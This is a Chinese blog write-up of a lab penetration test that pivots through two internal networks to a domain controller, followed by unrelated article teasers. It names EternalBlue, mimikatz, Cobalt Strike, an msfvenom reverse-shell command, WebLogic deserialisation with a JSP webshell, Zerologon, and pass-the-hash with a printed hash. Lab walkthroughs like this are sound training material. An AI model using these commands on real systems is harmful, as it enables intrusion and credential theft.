记一次靶场搭建与渗透测试

news/2024/11/15 2:58:32/

渗透目标

通过Windows7打入工作组环境,穿透两层内网拿到DC(域控制器)权限
环境搭建

环境搭建

网络拓扑

在这里插入图片描述

虚拟机网络配置

在这里插入图片描述

渗透测试

永恒之蓝外网打点

nmap -sS 192.168.2.0/24扫描外网存活主机,发现两台主机192.168.2.128和192.168.2.129,并且445端口都是打开的,可能存在永恒之蓝漏洞
在这里插入图片描述
用msf来进行永恒之蓝漏洞的利用:search ms17-010
在这里插入图片描述
选择模块3来进行永恒之蓝漏洞的扫描:use 3,发现主机192.168.2.128存在永恒之蓝漏洞

在这里插入图片描述
接着使用攻击模块对这个漏洞进行利用use exploit/windows/smb/ms17_010_eternalblue,同样设置set rhosts=192.168.2.12
在这里插入图片描述
权限已经是SYSTEM权限,简单查看一下系统信息,发现在一个工作组内(Domain: WORKGROUP)
在这里插入图片描述
导入mimikatz,尝试获取票据或者明文密码信息,得到密码:xiaodi
在这里插入图片描述

Cobalt Strike上线Windows 7

关闭防火墙
在这里插入图片描述
开启teamserver
在这里插入图片描述
客户端连接在这里插入图片描述
设置listener并且生成一个包含这个listener的木马
在这里插入图片描述
将木马上传到外网的Windows 7靶机并执行,靶机成功上线,查看网络
在这里插入图片描述
直接跑mimikatz得到密码xiaodi
在这里插入图片描述

psexec横向移动到Windows 10

然后用Portscan扫描主机
在这里插入图片描述
执行完扫描后,Targets中会出现主机192.168.2.129,使用psexec进行横向,输入刚刚得到的用户名和密码:
在这里插入图片描述
成功拿下Windows10
在这里插入图片描述
收集相关信息,发现新的网段192.168.3.*
在这里插入图片描述
扫描一下端口,发现两台主机,一台192.168.3.128是这台Windows 10,另一台就是下一阶段的目标192.168.3.129
在这里插入图片描述

MSF上线Windows 10

先生成一个反向木马:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.2.130 lport=6666 -f exe -o m2.exe
在这里插入图片描述
通过Cobalt Strike上传木马

在这里插入图片描述
msf设置监听
在这里插入图片描述
成功上线,查看路由信息
在这里插入图片描述
添加路由
在这里插入图片描述
设置socks代理
在这里插入图片描述配置kaili的全局代理工具proxychains

在这里插入图片描述

Weblogic打入win12

利用工具:https://github.com/rabbitmask/WeblogicScan
换成另一种代理方式,利用Cobalt Strike上代理
在这里插入图片描述
同样修改mousepad /etc/proxychains4.conf,配置好端口,再用
proxychains4 python WeblogicScan.py -u 192.168.3.129 -p 7001启动,发现存在weblogic相关的CVE漏洞
在这里插入图片描述

存在cve-2016-0638,存在cve-2017-10271,存在cve-2017-3506等
然后利用工具:https://github.com/shack2/javaserializetools/releases,
proxychains4 java -jar javaserializetools.jar运行jar包,检测到漏洞
在这里插入图片描述
能够进行命令执行
在这里插入图片描述
冰蝎生成jsp木马在这里插入图片描述
上传生成的jsp木马
在这里插入图片描述
在这里插入图片描述
连接木马
在这里插入图片描述
使用Cobalt Strike中转上线,设置监听
在这里插入图片描述
然后生成木马
在这里插入图片描述
使用冰蝎上传木马执行,成功拿下
在这里插入图片描述
至此拿到了三台机器在这里插入图片描述
收集网络信息,发现网段192.168.10.*
在这里插入图片描述
端口扫描,发现其他两台机器:192.168.10.10和192.168.10.12
在这里插入图片描述

横向移动到Win12-WEB

还是先在weblogic这台机器上跑mimiktaz
在这里插入图片描述
得到明文密码Administrator和Admin12345,再来试试横向移动
首先创建一个监听器,这里由于观察到上述端口扫描的结果中445端口是开放的,因此采用SMB类型监听器在这里插入图片描述
然后进行横向移动在这里插入图片描述因为是中转的,所以有耐心点,等待几分钟后,连接建立
在这里插入图片描述
可以看到成功上线Win12-WEB
在这里插入图片描述
收集Win12-WEB的网络信息
在这里插入图片描述
查看系统信息
在这里插入图片描述
查看权限
在这里插入图片描述

渗透域控

在上一步中192.168.10.*这个网段三个机器已经得到了两个,剩下的192.168.10.10就是我们最后的目标:DC:域控制器
在Win12-WEB这台机器上查看域控:

在这里插入图片描述
Nmap扫描一下,没有发现特别的服务:

在这里插入图片描述
然后尝试寻找DC的相关漏洞,尝试cve-2021-1472
首先使用cobalt strike开代理

在这里插入图片描述
然后配置kali的proxychains4:mousepad /etc/proxychains4.conf
在这里插入图片描述
扫描一下端口:proxychains4 nmap 192.168.10.10,发现没有开什么特殊服务

在这里插入图片描述
没办法,大海捞针,测试一下这个CVE:CVE-2020-1472(https://github.com/SecuraBV/CVE-2020-1472)
在这里插入图片描述
尝试利用这个漏洞:https://github.com/dirkjanm/CVE-2020-1472,成功置空DC密码
在这里插入图片描述
获取hash值
在这里插入图片描述
利用得到的Administrator的hash值:aad3b435b51404eeaad3b435b51404ee:a402bea39d0f49b50ea1941120780ee3:::来进行横向移动
proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:a402bea39d0f49b50ea1941120780ee3 DC$/Administrator@192.168.10.10
拿到域控shell,渗透结束

在这里插入图片描述

查看网络信息
在这里插入图片描述


http://www.ppmy.cn/news/69994.html

相关文章

7.机器学习诊断法

怎样评估机器学习算法的性能? 利用机器学习诊断法来评估机器学习算法的性能。诊断法是一种测试法,通过这种测试能够了解算法在哪里出了问题,这也能够告诉我们要想改进一种算法的效果、什么样的尝试才是有意义的。 7.1 评估假设 评价算法学…

0702可分类变量的微分方程-微分方程

文章目录 1 一阶微分方程变形2 可分离变量的微分方程2.1 定义2.2 解法 3 例题结语 1 一阶微分方程变形 本节至第四节我们学习的都是一阶微分方程 ​ y ′ f ( x , y ) y^{}f(x,y) y′f(x,y) (2-1) 一阶微分方程对称形式 p ( x , y ) d x Q ( x , …

每日算法(第三期)

2023年5月17日 先回顾一下昨天的算法题,及答案 题目:寻找两个有序数组的中位数 给定两个大小分别为 m 和 n 的有序数组 nums1 和 nums2。请你找出这两个有序数组的中位数,并且要求算法的时间复杂度为 O(log(m n))。 你可以假设 nums1 和 num…

SpringBoot整合MyBatis-Plus实现增删改查

简介 MyBatis-Plus (opens new window)的增强工具,在 MyBatis 的基础上只做增强不做改变,为简化开发、提高效率而生。 特性 无侵入:只做增强不做改变,引入它不会对现有工程产生影响,如丝般顺滑损耗小:启…

【英】考虑多能负荷不确定性的区域综合能源系统鲁棒规划(MatlabPython代码)

💥💥💞💞欢迎来到本博客❤️❤️💥💥 🏆博主优势:🌞🌞🌞博客内容尽量做到思维缜密,逻辑清晰,为了方便读者。 ⛳️座右铭&a…

DC-9通关详解

信息收集 漏洞发现 result.php处存在sql注入 sqlmap跑信息 python sqlmap.py -u http://192.168.45.146/results.php --data search1 -D users -T UserDetails --dump 拿了几个尝试登录都无效 ssh尝试登录直接拒绝了 再看Staff表 查哈希 进后台 多了一个添加记录的功能 没啥…

分享一个图片展示特效

先上效果图&#xff1a; 备注&#xff1a;这个效果图太大了&#xff0c;压缩了一下效果有点不咋好看。感兴趣同学们可以自己运行代码看一下&#xff0c;保证不会失望~ 再上代码&#xff1a; <!DOCTYPE html> <html lang"en"> <head><meta cha…

C嘎嘎~~[类 下篇 之 日期类的实现]

类 下篇 之 日期类的实现 6.const成员6.1 const成员的引入6.2const成员的概念 7.日期类的实现 6.const成员 6.1 const成员的引入 class Date { public:// 构造函数Date(int year 2023, int month 5, int day 5){_year year;_month month;_day day;}void Print(){cout &…